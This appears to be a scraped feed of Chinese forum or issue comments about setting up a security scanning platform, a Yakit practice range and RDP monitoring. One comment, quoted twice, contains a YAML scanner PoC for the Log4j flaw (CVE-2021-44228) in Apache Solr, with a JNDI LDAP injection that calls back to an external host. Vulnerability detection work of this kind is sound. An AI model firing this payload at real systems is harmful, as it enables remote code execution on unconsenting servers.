charis
charis
> 请提供完整日志,并详细描述问题。 1、建议使用centos7.6,非常稳一点坑都没 2、建议使用docker安装,源码安装的话自己研究 博主,这是我搭建过程的视频。【2024-06-12 20-59-44】 https://www.bilibili.com/video/BV1Y1421C77V/?share_source=copy_web&vd_source=d8b3401c69e95f347bd42cee04d6a532
> 把worker中的两个sh文件换成755试试 换成CentOS Linux 可以了。
> 把worker中的两个sh文件换成755试试 ubuntu 也可以 博主 把worker中的两个sh文件换成755 最重要文件位置要对,像这样就没问题了! 
我用的腾讯云的,阿里云的太麻烦了。
poc如下: ```yaml name: poc-yaml-apache-solr-log4j-cve-2021-44228 transport: http set: reverse: newReverse() reverseRMI: reverse.rmi rules: r0: request: method: GET path: /solr/admin/collections?action=${jndi:ldap://{{reverseRMI}}}&wt=json follow_redirects: false expression: response.status == 400 && reverse.wait(5) expression: r0() detail: author:...
> poc如下: > > name: poc-yaml-apache-solr-log4j-cve-2021-44228 > transport: http > set: > reverse: newReverse() > reverseRMI: reverse.rmi > rules: > r0: > request: > method: GET > path: /solr/admin/collections?action=${jndi:ldap://{{reverseRMI}}}&wt=json >...

> 有没有在线的yakit 靶场 没有,可以直接下载一个yakit ide启动
> 如题,我司众多的 win server 物理主机,上面古老的软件卡的要死,崩了的话只能重启系统(机器能ping,但是远程不了),网上搜有没有 RDP 自动登录方案+自动截图,我在想能不能自动截取截图用AI方式判机器是否远程崩了,不知道大佬有没有这个计划,想忽悠领导试试。 不然人工天天给他半夜巡检系统累死了。 自己实现一个利用AI辅助编码,实现起来应该不难使用python 脚本的 pywin32 库